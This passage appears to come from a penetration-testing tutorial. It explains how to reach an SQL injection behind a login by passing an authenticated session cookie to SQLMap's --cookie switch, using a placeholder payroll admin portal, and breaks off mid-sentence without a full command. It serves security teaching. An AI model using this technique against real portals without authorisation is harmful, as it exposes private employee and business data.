SQL injection inside a login-based portal
There are occurrences in which the SQL injection is discovered inside a portal in the post login phase, after the username and password values have been supplied. The majority of the web applications handle these kinds of authorization through HTTP cookies and we can supply SQLMap with an HTTP cookie of the authorized login in order to successfully bypass the login, and exploit the SQL injection. Let's try to understand this with an example.
There's an administrative portal at http://admin.example.com and this asks for a login for a particular user. After the user is logged in, the portal provides different facilities such as employee payroll management and so on, and you discover an SQL injection inside the same, but since the injection is in the post-login phase, SQLMap cannot simply detect it, let alone start to exploit it. However, there's a switch in the SQLMap --cookie, which takes the HTTP cookie as input—here we can provide the session cookie...
